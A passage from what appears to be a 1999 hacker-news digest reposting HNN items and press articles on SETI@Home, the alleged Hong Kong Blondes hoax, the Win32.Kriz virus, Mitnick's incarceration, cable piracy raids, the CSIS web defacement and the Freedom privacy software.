Del Torto had advice for his Fortune 1000 brethren, too.
Asked if young hackers, who may not be partial to suits
and ties, are discriminated against, Del Torto recalled
that Dan Farmer, author of the widely used Satan
network scanning tool, was once turned down by a
prospective employer who found his appearance
unsettling. He urged IT managers to avoid superficial
judgments and focus on the reputation of the individual.
IT managers interviewing young people who "act
differently" should remember when they were young, he
advised.
Del Torto noted that in the relatively small community of
IT security professionals, people are preceded by their
reputations. He said he knows programmers who are
talented, but he won't hire or recommend them because
they don't act responsibly.
@HWA
39.0 SETI@Home, Largest Computation Ever
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Space Rogue
With over 1 million users, and 50,000 years of
accumulated computer time the SETI@Home project is
now the largest computation ever. SETI@Home is a
distributed computing project that analyzes radio signals
for signs of alien life. The HNN SETI@Home Team is still
going strong.
BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_423000/423022.stm
HNN SETI@Home Team
http://setiathome.ssl.berkeley.edu/stats/team/team_2251.html
Tuesday, August 17, 1999 Published at 18:11 GMT 19:11 UK
Sci/Tech
Alien hunter breaks record
The massive Arecibo telescope is collecting the data
By BBC News Online Science Editor Dr David
Whitehouse
The SETI@home screensaver project, which allows
anyone with a desktop computer to join the search for
intelligent life in space, is now the largest computation
ever done, on Earth at least.
Since May, over a million people have downloaded the
SETI@home screensaver. But, despite an accumulated
50,000 years of computer time, no signs of alien life have
yet been found.
The SETI@home program
has infiltrated homes, offices
and classrooms in 223
countries, "It is truly a
phenomenon," said
SETI@home project director
David Anderson. "One person
runs it in an office and pretty
soon the whole office is doing
it."
Companies large and small
(including the BBC) as well as schools and universities
have formed groups to compete to see whose computers
can analyse the most chunks of data.
The program acts like a screen saver, starting when the
computer is idle and analysing data collected from the
Arecibo radio telescope in Puerto Rico.
The analysis is done
automatically and the results
are sent back to the
University of California at
Berkeley, while participants
can see the progress on the
computer screen.
Number cruncher
According to Professor
Anderson it proves the value
of distributed computing and
it has encouraged him to
look around for other projects that could benefit from this
technique.
"SETI@home is now the largest computation ever done
on this planet, we have accumulated more than 50,000
years of computing time so far," said project scientist
Dan Werthimer, a research physicist at the University of
California Berkeley's Space Sciences Laboratory.
"This also is the most sensitive sky survey ever
conducted," Professor Werthimer added. SETI@home is
so powerful because we are using the world's largest
telescope and we are able to use it continuously, 24
hours a day, by piggybacking on other observations."
Of the million people who have downloaded the software
about 600,000 have completed at least one unit of data
analysis.
Analysts say that the backlog of data from the Arecibo
telescope is rapidly disappearing, and Professor
Anderson and his team are currently updating the
software to analyse the data again to search for more
complex signals.
@HWA
40.0 Hong Kong Blondes Labeled a Fraud
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Simple.Nomad
An article in Computer currents has labeled the Hong
Kong Blondes as a hoax. The HKBs are a deep
underground group who work to disrupt Chinese
computer systems from the inside. This article claims
that because he can't find any evidence to support
their existence they must be fake. Maybe they are just
really good at hiding. That is, after all, what it means to
be underground. Last year the Cult of the Dead Cow
formed a relationship with the group to help train them
on encryption and intrusion techniques. Last December
the cDc issued a press release claiming that their
training had been successful and that their relationship
would now end. Just because the reporter who wrote
this article can find no evidence of their existence
probably means he didn't look too hard.
Computer Currents
http://www.currents.net/newstoday/99/08/18/news3.html
Late Update
In a recent conversation with HNN Reid Fleming a cDc
cultee said "An absence of evidence does not equal
evidence of absence."
The Hacker Hoax
By Neil Taylor, IT Daily.
August 18, 1999
The world's press might have been fooled into believing that
a Chinese hacker group plans to bring down the country's
information infrastructure. According to stories that began
circulating in July last year, the rogue group, the Hong Kong
Blondes, is made up of dissidents both overseas and within
the Chinese Government.
The rumours began when an interview with the group's
leader was published by US hacking group the Cult of the
Dead Cow (CDC) at http://www.cultdeadcow.com . In the
interview, illusive Hong Kong Blondes director Blondie
Wong said that he had formed an organization named the
Yellow Pages, which would use information warfare to
attack China's information infrastructure.
The group threatened to attack both Chinese state
organizations and Western companies investing in the
country. For their part, the CDC claimed that they would
train the Hong Kong Blondes in encryption and intrusion
techniques.
One year after the group's supposed launch, there is no
evidence that the Hong Kong Blondes ever existed. In fact,
all evidence appears to indicate that the Hong Kong Blondes
report was a highly successful hoax.
The story was first reported in Wired magazine, and during
the past year has been followed up by numerous publications
including USNews, the Los Angeles Times, Asiaweek and
ComputerWorld. In every case, the original source was the
CDC's July interview.
The CDC is best known for its remote administration tool
Back Orifice. BO can be installed on a Windows PC without
the user's knowledge, giving full control over the machine to
unauthorized third parties.
The first version of Back Orifice was released a month after
the Blondes story was leaked to Wired magazine.
Repeated attempts to contact the CDC failed to elicit a
response, and despite inquiries throughout the Hong Kong
technology and security industries, not one person contacted
had ever come across any evidence of the group's existence.
The Hong Kong Police, which is responsible for tracking
hacking activities locally, had no knowledge of the group.
Detective senior inspector Martyn Purbrick, of the
Commercial Crime Bureau's Computer Crime Section, said
that there had been no official reports of the group's
activities. He added that he only knew the group's name
through reports in the media.
Stephen Mak, principal assistant secretary of the information
technology and broadcasting bureau, said, "We have carried
out inquiries both within the government as well as with the
ISPA, but we could find no information about the group."
Samuel Chanson, director of the Cyberspace Centre at the
Hong Kong University of Science and Technology, said the
threats would take no great skill to carry out. "Hacking into
almost any major server is do-able with some training."
Chanson said that a group of his undergraduate students
took a two-day course in intrusion techniques, after which
they were able to break into several hundred servers in
campus tests. "We checked how good their network security
was and succeeded in bringing down a go
od number of their
servers as well as gaining important information... Attacking
the general commercial server is not a difficult task."
Early this year, a US hacker group, the Legion of the
Underground (LoU) at http://www.legions.org , launched a
declaration of infowar on China, in response to the harsh
penalties handed out for computer offenses in the country.
LoU members cited the Hong Kong Blondes as an influence
behind their short-lived war, which was abandoned following
condemnation from other hacker groups. However, a large
number of Chinese Web sites were hacked by protesters,
including Hongkong.com, China Window, Wenjin Software
and the semi-official China Society for Human Rights
Studies.
CDC remains tight-lipped on the issue. But publishers might
do well to remember a statement made by the group in its
Media Domination Global Update: "We intend to dominate
and subvert the media wherever possible."
@HWA
41.0 Peace Prize Winner Warns of Cyber War
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Lionel
Jose Ramos Horta, a Nobel laureate, has warned that if
fraud is detected in the August 30th balloting in the
vote for East Timor's independence then cyber war will
result. The Timor resistance leader has warned that a
dozen viruses were being designed by over 100 people
in Europe and North America to infect computers if there
is fraud detected. (While these claims may be true it
reeks of sensationalism and headline grabbing. With no
evidence to support these claims we remain doubtful.)
BBC
http://news.bbc.co.uk/hi/english/world/asia-pacific/newsid_423000/423549.stm
Wednesday, August 18, 1999 Published at 13:45 GMT 14:45 UK
World: Asia-Pacific
Timor activists warn of
cyber war
Gunmen shot at the offices of the main independence group on
Tuesday
Computer hackers plan to sabotage
Indonesia's banking system if Jakarta
rejects an East Timor vote for
independence, resistance leader Jose
Ramos Horta has warned.
Mr Horta said
about a dozen
viruses were
being designed to
infect computers
if there is fraud in
the 30 August
ballot on the territory's future.
The Nobel laureate warned that a 100-strong team of
hackers in Europe and North America had prepared a
campaign that would cause economic devastation to
Indonesia.
Their targets would include
computers controlling
banking, finance, the military
and aviation, he said in a
commentary in Australia's
Sydney Morning Herald.
"One computer wizard
recently told me, 'We will
terminate their banking
system. We will invade their
sites and destroy them...We
will cause them to lose
hundreds of millions of
dollars'," he added.
Electoral fraud
The warnings come as East Timor prepares to choose
between Jakarta's offer of autonomy or full
independence.
The United Nations which is
overseeing the ballot says it is
confident there will be a free and fair
vote.
But Mr Horta has warned that the
ballot could turn into the biggest
electoral fraud in modern times.
He said Indonesia's army intended to get a
pro-integration vote through by terror and fraud.
Mr Horta alleged that a violent campaign by pro-Jakarta
militias had already
cost over 1,000 lives
razed entire villages
uprooted 80,000 people
He said the vote was also compormised by
a ban on detained resistance leader Xanana
Gusmao and himself during the campaigning
continued Indonesian army support for the militias
a biased Indonesian controlled East Timorese
media
"All this makes for an extremely dangerous situation.
Full-scale violence before or after the ballot is now
almost certain," Mr Horta added.
''The next phase of
resistance will be much more
desperate and ferocious and
will not be contained to East
Timor," he added.
Mr Horta's comments came
as Amnesty International
also warned that Indonesia's
failure to halt the bloodshed
in East Timor - mainly by
pro-Jakarta militias -
threatened to prevent a fair
ballot.
Indonesia invaded East Timor, a former Portuguese
colony, in 1975 and annexed it the following year in a
move not recognised by the UN.
Human rights groups say more than 200,000 people
died, many of them from starvation, in the years since
the invasion.
@HWA
42.0 Mitnick Still Denied Kosher Food
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by TurTleX
In continuing violation of Constitutional Law, Kevin
Mitnick is still being denied the ability to practice his
religion by not being served kosher foods. A rabbi for
the San Bernardino County Detention Center has
confirmed that the center does not provide kosher
meals. Kevin has started eating the vegetarian meals
provided by the prison as an alternative, even though
they are not kosher.
Wired
http://www.wired.com/news/news/politics/story/21322.html
Life Not Kosher for Mitnick
by Douglas Thomas
12:15 p.m. 18.Aug.99.PDT
Jailed computer hacker Kevin Mitnick wants out of his current facility because it doesn't serve kosher food.
Mitnick wouldn't eat for the first two days of his stay at the San Bernardino County Detention Center after being transferred there from the Los
Angeles Metropolitan Detention Center.
He only recently began eating the jail's vegetarian meals, which it offers as a substitute. But those meals don't meet rabbinical standards.
Mitnick insists that maintaining a kosher diet is extremely important to him.
"This is a violation of my constitutional rights," Mitnick said. "I'm being forced into a situation where I have to violate my religious beliefs or starve."
Complicating the move, Mitnick said, is that his MDC-stored money won't be available for several weeks, making it impossible for him to buy
commissary food. In addition, he said, prices are triple what they were at the old facility.
Mitnick's rabbi, Aaron Kriegal, and the rabbi for the San Bernardino County Detention Center, Hillel Cohn, confirmed that the SBCDC does not serve
kosher meals to Jewish inmates.
"Does it make life more difficult? Yes," Cohn said. "But being in prison is difficult. It wasn't meant to be a country club. There are some sacrifices
inmates have to make."
Cohn said returning Mitnick to Los Angeles would "make life easier" for Mitnick, but did not believe that the move was likely.
"This is not the first request we've had to have an inmate transferred for this reason," Cohn said.
At sentencing, Mitnick's attorney failed to persuade US District Judge Marianne Pfaelzer that Mitnick serve his time at the MDC to ensure his access
to kosher meals.
Currently, Mitnick shares one large cell with approximately 60 other inmates, each of whom is issued a small mattress, sheet, and blanket. The cell
contains one toilet and one shower, each in open view of the cell.
Mitnick calls the conditions "dehumanizing."
Mitnick is expected to spend four to six weeks at the San Bernardino facility while awaiting final designation, most likely to Nellis Prison Camp just
outside of Las Vegas.
Mitnick's attorneys have filed a motion with the court requesting that he be transferred back to the MDC until the Bureau of Prisons decides where
he will serve the remainder of his 46-month prison sentence.
Because of previous time served, Mitnick is expected to be released in January 2000.
@HWA
43.0 Cable Pirates Busted
~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by skeletor and deepquest
MediaOne, the largest cable provider in Massachusetts,
recently performed an audit of 162,000 non-customer
homes and found that over 23,000 where receiving
cable illegally. MediaOne has decided not to press
charges but instead has disconnected the freeloaders.
MediaOne has hired contractors to go street by street
to check whether non customers are receiving cable TV
service. These audits are preformed from outside the
homes.
Boston Globe
http://www.boston.com/dailyglobe2/230/metro/many_get_cable_TV_for_free_audit_finds+.shtml
A raid conducted on Wednesday by MediaOne officials
and the Moreno Valley Police Department has uncovered
more than a million dollars' worth of "black boxes," the
descrambling device that enables users to illegally
access cable-TV channels. All equipment, including
shipping and billing information from Cable Converter
Concepts and Hi-Tech Converter Labs was confiscated.
Andover News
http://www.andovernews.com/cgi-bin/news_story.pl?28463/topstories
Boston Globe;
THIS STORY HAS BEEN FORMATTED FOR EASY PRINTING
many get cable TV for free, audit finds
MediaOne pulls plug on thousands
By Bruce Mohl, Globe Staff, 08/18/99
In a street-by-street survey in Eastern Massachusetts, the state's largest cable television
company is finding that thousands of people are getting cable but not paying for it.
Of 162,000 non-customer homes or apartments checked so far by MediaOne, 14 percent, or
nearly 23,000, were receiving an unauthorized cable TV signal. In most cases, the signal was either
stolen or left on inadvertently by MediaOne.
MediaOne is not taking the freeloaders to court or demanding back payment. Instead, the company
is disconnecting the unauthorized service and politely urging the consumer to start paying for it. So
far, about 16 percent have done so.
''It's an amnesty kind of deal,'' said John Fouhy, director of security for MediaOne in the Northeast.
''We don't consider it stealing or illegal. It's just not in our billing system.''
Fouhy declined to identify where the problem is most severe, saying he did not want to cast
aspersions on any particular community. But he said it is more pronounced in urban areas with
apartment buildings where people tend to move in and out a lot. MediaOne serves most of Eastern
Massachusetts except for Boston, Brookline, and Braintree.
''Leafy suburbs tend to have lower unauthorized rates,'' Fouhy said.
At a time when MediaOne is rapidly building a sophisticated network to carry high-speed Internet
access and local phone service in addition to cable TV, the fact that thousands of people are getting
cable for free cannot do the company's high-tech image any good.
But Fouhy said he was not surprised by the numbers, given what companies in other parts of the
country have found with similar audits. He said that some people are stealing the signal and in other
cases are just taking advantage of MediaOne's failure to shut previous service off.
He gave the example of someone in Cambridge who is paying for cable TV and moves out of the
apartment. Rather than send a technician to the apartment to shut service off, Fouhy said,
MediaOne and the companies it has acquired in recent years often leave service on for the tenant
moving in. That way service can start immediately with little or no installation cost for both the
consumer and the company.
''In most instances, people understand cable doesn't come with the house,'' Fouhy said.
But apparently all too often the new tenant would just plug his cable wire into his TV set or
videocassette recorder and start watching CNN.
Fouhy said the survey began in March and is scheduled to end in October and then resume again
next year. It has focused mostly on communities where ''churn'' - turn-ons and turn-offs of cable
service - is high or where cable penetration seems unusually low. In those communities, Fouhy said,
MediaOne has hired contractors to go street by street to check whether noncustomers are
receiving cable TV service. Fouhy said the surveyors do not go inside homes.
The MediaOne survey is not designed to track down people who are using black boxes to illegally
pirate premium cable channels, a problem that Fouhy described as ''significant.'' Industrywide, he
said, cable companies are losing more than $5 billion a year in pirated premium and pay-per-view
channels. MediaOne officials declined to comment on what tactics they are using to eliminate this
fraud.
In such an extensive audit, accidents apparently happen. Susanna Joannidis of Cambridge, who
owns a single-family home and is up-to-date on her monthly MediaOne bill, said she and a
neighbor lost their cable service early last month. It took almost two days to figure out that a
technician had shut off the wrong service, causing Joannidis to miss the finals of Wimbledon that she
had been eagerly anticipating.
Joannidis said she thought it was strange that MediaOne does not know who its customers are.
MediaOne sent Joannidis a letter of apology and gave her a $110 credit.
This story ran on page A01 of the Boston Globe on 08/18/99.
© Copyright 1999 Globe Newspaper Company.
-=-
MediaOne Sting Operation Nabs
Web-Based Cable Pirates; Moreno Valley
Police Department Raid Nets More Than
$1 Million in Illegal Equipment
EL SEGUNDO, Calif., Aug 18, 1999 (BUSINESS WIRE
via COMTEX) -- OnWednesday, MediaOne(R) and the
Moreno Valley Police Department executed three
early-morning search warrants, raiding private homes in
Riverside County, Calif., and uncovering evidence of a
multimillion-dollar national cable-piracy operation that
had been conducted over the Internet.
The raid netted more than a million dollars' worth of
"black boxes," the descrambling device that enables
users to illegally access cable-TV channels, as well as
master computer chips that could be cloned for new
black boxes, and shipping and billing evidence.
Charles Balan, 28 years old, of Romoland, Calif., and
Brian Fulk, 24 years old, of Moreno Valley, were
arrested and are facing felony charges. A third suspect
is still at large. The extensive computer equipment from
their operations, called Cable Converter Concepts and
Hi-Tech Converter Labs, was confiscated, and their
Web sites were shut down.
Theft of service is one of the biggest problems faced by
cable companies today. It is estimated that this
criminal activity costs the industry and its customers
more than $5.8 billion annually. Not only is this cost
passed on to honest customers, but the quality of their
service is also diluted by the illegal hardware.
Cities themselves also lose millions in franchise fees --
the monthly, subscriber-based revenues paid to them
by cable-TV companies.
"The success of today's operation is a perfect example
of what occurs when you have a cooperative effort
between private industry and law enforcement," said
Sgt. Joseph Cleary, supervisor in charge of the
search-warrant execution.
"We're getting the message out that we won't tolerate
this kind of criminal activity," said Mike Bates, director
of security for MediaOne. "Abuse of e-commerce via
the Internet is a nationwide problem that affects cities,
companies and private citizens alike."
MediaOne Group (NYSE:UMG) is one of the world's
largest broadband-communications companies,
bringing the power of broadband and the Internet to
customers in the United States, Europe and Asia. The
company also has interests in some of the
fastest-growing wireless-communications businesses
outside the United States.
For 1998, the businesses that constitute MediaOne
Group produced $7.1 billion in proportionate revenue.
On May 6, 1999, the company entered into an
agreement to merge with AT&T.
Copyright (C) 1999 Business Wire. All rights reserved.
@HWA
44.0 CSIS Admits Web Defacement
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by deepquest
The Canadian Security Intelligence Service has admitted
that its web page had been defaced back in 1996. The
spy agency admitted that its web page had been
changed to read "Canadian Security Illegal Service".
CSIS admitted what had occurred in a recent paper
released by the agency that discuss cyber warfare.
Globe Technology
http://www.globetechnology.com/archive/gam/News/19990818/UTERRN.html
Andover News
http://www.andovernews.com/cgi-bin/news_story.pl?28513/topstories
Hackers altered its Web page, CSIS reports
Terrorists could cripple societies, start wars
by invading cyberspace, spy agency warns
JEFF SALLOT
Parliamentary Bureau
Wednesday, August 18, 1999
Ottawa -- Computer hackers altered the logo on the Canadian Security Intelligence Service's Web page to
read "Canadian Security Illegal Service" within days of the site going up on the Internet, the spy agency says.
This act of cyberspace vandalism was quickly cleaned up, and there is no evidence the hackers ever got into
the agency's top-secret internal computer network, CSIS says.
But the incident is a warning about how hackers can manipulate data from long distances, CSIS says in a new
background paper describing trends in international terrorism and warning that cyberattacks might cripple
modern societies.
The background paper was released yesterday and is the service's first public disclosure of the 1996 incident
involving its own Web page.
CSIS spokesman Dan Lambert said the Web sites of several other federal government departments were also
hit at about the same time.
An investigation was conducted, but CSIS will not disclose the results.
The background paper warns that as modern countries become increasingly dependent on computer-based
communication, "future wars could involve cyberattacks on information infrastructure."
Canada is particularly vulnerable because of its heavy reliance on these advanced technologies.
"If teenagers can compromise networks using basic skills and tools available on the Internet, the concern is
what can be accomplished by terrorist groups or states with far greater resources and motivation," the paper
says.
The paper says that the Web site of the Irish Republican Army openly discusses ways it could use so-called
information operations to attack British interests.
A support group for Tamil terrorists took responsibility for attacking the E-mail system of Sri Lankan
diplomatic missions in Washington and New York two years ago.
"On the World Wide Web, distance is not a factor. . . . We are as vulnerable as any other country and have
more assets at risk than most," the paper says.
CSIS, like other sensitive government agencies, almost certainly protects its secret computer systems by
physically segregating them from any connection to the Internet, commented Peter Davis, a computer-security
consultant.
Mr. Davis said that terrorist attacks in cyberspace are going to become more frequent as groups become
more sophisticated in the use of technology.
Even some of the most sophisticated military communications systems appear to be vulnerable. Military
sources have said the Canadian Forces lost key computer links with 10 military allies for 24 hours during a
simulated cyberterrorist attack last year.
A Canadian team working in Britain penetrated military networks as far away as Australia.
-=-
Canadian Security Agency Warns Against
Cyber-Attack
OTTAWA, ONTARIO, CANADA, 1999 AUG 18
(Newsbytes) -- By Martin Stone, Newsbytes. Canada'a
central security agency, the Canadian Security
Intelligence Service (CSIS) has issued a warning
against global terrorism, citing hackers and crackers,
those who penetrate secure computer systems, as a
growing threat.
In a background paper released Thursday, CSIS admits
that crackers entered their Website in 1996 and altered
their logo by changing the word "Intelligence" to
"Illegal." In this first public disclosure of the incident,
the agency says the damage was quickly discovered
and corrected, but the event serves as an example of
how cyber-savvy terrorists may be able to tamper with
mission-critical systems.
The paper gives a brief outline of terrorist activities of
the past and suggests that insurgents could severely
cripple societies and even start wars by invading and
taking control of the critical computer components.
The CSIS site was cracked within days of its having
gone live, but the agency says there is no evidence
that any sensitive files were entered.
CSIS spokesman Dan Lambert told Newsbytes that the
site is in the public domain and is in no way connected
to other CSIS computer systems, adding that the
server is not even located on the CSIS premises, but
housed at Canada's Department of Public Works.
He said the Websites of several other federal
government departments were also invaded at about
the same time. Since then, there have been several
instances of federal and provincial government
Websites being cracked, however no serious outages
or security breaches have occurred.
The study hints that, as modern civilizations become
more dependent on computers and connectivity, future
wars could be fought in cyberspace.
Canada is known to be particularly vulnerable due to a
heavy reliance on advanced technologies, as has been
reported recently by Newsbytes and other media.
The backgrounder says: "If teenagers can compromise
networks using basic skills and tools available on the
Internet, the concern is what can be accomplished by
terrorist groups or states with far greater resources and
motivation."
The paper also states: "Terrorist methods continue to
become more sophisticated, both in terms of
technology and the exploitation of public opinion and
media channels. Globally mobile and knowledgeable
about communications, explosives technology and
computers, they have contacts around the world. Their
activities and targets are difficult to predict. The use of
technology, always part of the terrorist arsenal, has
been augmented by encryption and the Internet to
facilitate communication and reach a wider audience.
"In addition, the growing dependence of states on
computer-based communication and technologies is
leading to a world in which future conflicts could involve
activities in cyberspace and attacks on a state's
information infrastructure, now commonly referred to as
information operations. As one of the world's most
advanced states in its reliance on information
technologies, Canada is concerned about its
vulnerability to this threat.
"We are already seeing indicators of the changing
threat environment in this area. One of the IRA
Websites openly discusses ways it could use
information operations to attack British interests. In the
summer of 1997, a group linked to the Liberation Tigers
of Tamil Eelam claimed responsibility for an attack on
the e-mail systems of the Sri Lankan Embassy in
Washington and its Mission in New York.
"If a Website is successfully hacked into, data on the
site can be manipulated. As an example, the CSIS
Website was hacked into and a few words changed on
the home page. On the World Wide Web, distance is
not a factor. Canada's geographic location and the
world's longest undefended physical border provide no
natural protection against these kinds of attacks. We
are as vulnerable as any other country and have more
assets at risk than most."
Analysts suspect that cyber-terrorist attacks will
become more frequent as groups grow more
sophisticated in the use of technology.
The full text of the backgrounder can be found at
http://www.csis-scrs.gc.ca
@HWA
45.0 Win32.Kriz Set To Go Off Christmas Day
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by AlienPlague
A new virus set to hit on Christmas day could be more
devastating than the CIH virus. The virus, which has
been described as being "very well written", kills the
CMOS memory, overwrites data on all available drives,
and destroys the flash BIOS using the same method the
Chernobyl virus used. Luckily, computer users will have
until December 25 to buy or update their anti-virus
software. The virus only infects users of Microsoft
Windows.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2316716,00.html?chkpt=hpqs014
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
'Christmas' virus can destroy PCs
By Bob Sullivan, MSNBC
August 18, 1999 3:00 PM PT
URL:
A nasty new virus discovered by researchers promises to do even more damage to victims than
the Chernobyl virus. It has the ability not only to erase files, but also to render a PC useless by
destroying its flash BIOS.
The good news is it won't execute until Dec. 25; the bad news is PC users without anti-virus
programs may have a very bad Christmas Day.
The author of Win32.Kriz, discovered recently by researchers, sounds as if he or she has an ax to
grind against religious folks.
Inside the virus is a text string with a poem full of expletives criticizing
those who preach religion: "I don't wanna hear it, coz I know none of
it's true," the author writes, according to anti-virus research firm
Kaspersky Lab.
Victims of the virus -- who can be anyone using Windows 95,
Windows 98 or Windows NT -- can expect a load of trouble. The virus kills the CMOS memory,
overwrites data in all files on all available drives, and then destroys the flash BIOS by using the
same routine that was found in the "Win95_CIH" virus, also known as Chernobyl.
"This is a nasty one, very well written," said Dan Takata of anti-virus vendor Data Fellows Inc.
He said it's too early to tell if the virus will be widespread -- but potential victims have until Dec.
25 to update their antivirus programs against it.
@HWA
46.0 MS Windows Media Audio Broke One Day After Release
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by darktide
Microsoft recently released Windows Media Audio, a
audio format set to compete against MP3. The
difference is the WMA has security features built in to
force people to pay for the music they listen to. One
day after the release of this format cracking programs
like unfuck.exe and AudioJacker where available to
defeat this technology. Microsoft is working on a fix.
C|Net
http://www.news.com/News/Item/0,4,40672,00.html?st.ne.fd.gif.f
Windows Media hits sour note
By Jim Hu and Michael Kanellos
Staff Writers, CNET News.com
August 18, 1999, 4:45 p.m. PT
A day after Microsoft released its new Web music technology, the company confirmed that crackers have already
developed a program to strip away the security behind it.
Microsoft acknowledged that the executable file, dubbed "unfuck.exe," exists and works. In fact, there are a number of programs,
such as Audiojacker, that perform similar functions.
"This one just has a glitzier name," said a Microsoft spokesman, adding that the company is working on a fix.
Normally, only the user who downloads and pays for a song encrypted in Microsoft's Windows Media Audio 4 technology can
listen to it. But with the new exploit, someone who pays for the song also can email it to friends who
want to hear or copy it.
The program works by rerecording musical tracks in an unprotected format. To take advantage of the
program, a would-be pirate has to buy and download music. During the downloading process, the
executable intercepts the music and reformats it into a different format that doesn't have embedded
security elements. Copies can then be made freely.
Windows Media Audio is Microsoft's answer to the numerous audio compression formats that have
gained popularity in the last year. These technologies allow users to download music off the Web
and play it back. MP3 is one technology that has gained considerable popularity.
Although piracy is theft and represents lost potential revenue, observers say the record industry has
historically overplayed the threat. Pirated copies of software or music, especially among hobbyists,
will always crop up. Recently the Recording Industry Association of America, which represents the
major U.S. record companies, has acknowledged this publicly.
"We'll always have piracy of cassettes and CDs, for instance, with the flea markets or street vendors. That will never go away, and
I think the same will be true of the Internet," Hilary Rosen, chief executive of the RIAA, said in an earlier interview. "But we're
going to see an explosion of legitimate music online. And consumers are going to have an alternative. I believe consumers will
want the alternative."
Some analysts agree that consumers tend to gravitate toward buying legitimate copies.
"The piracy threat is a bit overblown at the present time," said Mark Hardie, senior analyst at Forrester Research. "There will be
levels of piracy that will be unavoidable...You will always have code somewhere in cyberspace that will hack through encryption."
He added that it is easier to trace the source of pirated copies of digital music than copies made from traditional methods of
recording. That means it likely will be easier to stop illegal copying in the future than it is today, he said.
Windows Media is a group of technologies for multimedia playback. Besides Windows Media Audio, the package includes
Windows Media Player and software and services including Windows Media Services, Windows Media Tools, and a software
development package.
The Windows Media Audio exploit was first reported on the pro-MP3 Dimension Music site.
@HWA
47.0 Available Soon, Freedom!
~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by jordan
Zero-Knowledge Systems, the Montreal-based start-up,
is set to release Freedom, which is a comprehensive
Internet privacy package that offers multiple online
pseudonyms and Byzantine encrypted rerouting that
even Zero-Knowledge couldn't crack if it wanted to.
Freedom 1.0 for Windows is set for release in late
October or early November.
CNN
http://www.cnn.com/TECH/computing/9908/18/freedom/index.html
Zero Knowledge Systems
http://www.zks.net/clickthrough/click.asp?partner_id=542
Total digital privacy may be on the horizon
August 18, 1999
Web posted at: 5:32 p.m. EDT (2132 GMT)
By Robin Lloyd
CNN Interactive Senior Writer
(CNN) -- If American software
developers were to touch any of the
code in the 10,000 released beta
versions of an Internet privacy
solution that is getting good
preliminary marks, they would be
subject to prosecution.
In fact, if Zero-Knowledge Systems
were based in the United States, it
would be illegal for the company to
export its Internet privacy software,
dubbed 'Freedom.'
Instead, the Montreal-based start-up,
headed up by 26-year-old Austin Hill, is set to release the first product of its
kind -- a comprehensive Internet privacy package that offers multiple online
pseudonyms and Byzantine encrypted rerouting that even Zero-Knowledge
couldn't crack if it wanted to.
No more cookies, e-mail trails and digital identity stealing. At least, that's the
idea. More than a dozen "cookie killers" already exist, along with several
e-mail and browser anonymity services such as anonymizer.com.
Those all rely on what Hill calls a "trust-me" mechanism. A third party server
holds users' identity and data. Freedom makes it so the end-user has sole
possession of that data.
"If there was a gun to my head, I still could not reveal or break the privacy
of my users," Hill says.
The user has the only "key" to their pseudonyms, which can be linked to
independent e-mail addresses, geographic locations and encryption keys.
Freedom is designed to protect the e-mail, chats, browsing and newsgroup
searches of anyone from a Chinese dissident posting pro-democracy
messages to an employee checking out listings for Alcoholics Anonymous.
The software can encrypt private chats and newsgroup discussions, ensures
anonymous Web browsing and can even block spam, Hill says. Each digital
identity relies on full strength encryption that ranges from 128 to 4,096 bits.
Freedom 1.0, which works only on Windows platforms, is set for release in
late October or early November. It will be downloadable for $49.95.
Macintosh and Linux versions are due out next year. Freedom doesn't work
with America Online, however, since AOL is an online service separate from
the Internet.
Zero-Knowledge released 1,000 beta copies of Freedom at the DefCon 7
convention in Las Vegas last month. Since then, it has released thousands
more via its Web site. A total of 50,000 people have requested copies since
then.
How it works
Web users leave traces of their identity behind every time they visit a Web
site or send e-mail. To get a sense of the process, visit the Center for
Democracy and Technology's site and use its demo.
Freedom allows users to set up separate pseudonyms for different aspects
of their lives -- an identity for an online chat about health care, another for
interactions with friends and family, others for Internet browsing and finally a
'true' identity for e-commerce.
Zero-Knowledge is working on an e-commerce identity protection solution
for future versions.
Freedom scrambles data coming from a user's PC and hides the source and
destination of Internet traffic routed through the service.
The message or data packet is first sent to Zero-Knowledge's servers where
it is wrapped in a layer of encryption.
That initiates a delivery process where the data bounces from one
independently owned relay station to the next and can only be opened by
one specific user who then forwards it to another specific user, with that
process repeating several times.
Eventually a data packet goes to its intended target but neither snoopers, nor
the final recipient, have any way of tracing its origins.
Third-party protections, the approach relied upon by Freedom's
predecessors, can be hacked or bought away when the company makes a
new acquisition, as was the case when Double Click acquired Abacus, Hill
said. Or, civil lawsuits can force ISPs to turn over their records.
Freedom gets high marks
David Sobel, general counsel for the Electronic Privacy Information Center,
and Ari Schwartz, a policy analyst with the Center for Democracy and
Technology, agree that Freedom is a good solution.
"I suspect that it is one of the best solutions that we've seen," Sobel said.
Freedom's strength comes from Hill's philosophical commitment to
preserving privacy and anonymity on the Internet, Sobel said.
Schwartz underlined the Center's stance on Internet privacy -- software
solutions combined with self-regulation among service providers and
legislation will be needed to protect privacy online.
The U.S. Congress has introduced several bills this session relating to online
privacy but advocates say they may not go far enough.
A CDT report concludes that online privacy is the exception, not the rule, in
the private sector.
U.S. encryption policy has its pros and cons
The U.S. policy that prohibits encryption exports and labor is based on
protecting security codes produced and cracked by the FBI and other
national security agencies.
The downside is that we may lose out on what has turned into a $1.5 billion
cryptography business for Canada, where limits are less strict, Hill says.
The U.S. approach could backfire and result in a brain drain of encryption
experts, EPIC's Sobel said.
"The end result will be that American companies will lose leadership in this
field," he said, "and it is not going to result in encryption being out of the
hands of anyone our government might be concerned about."
@HWA
48.0 Is AOL hacking IM users?
~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by D----Y;
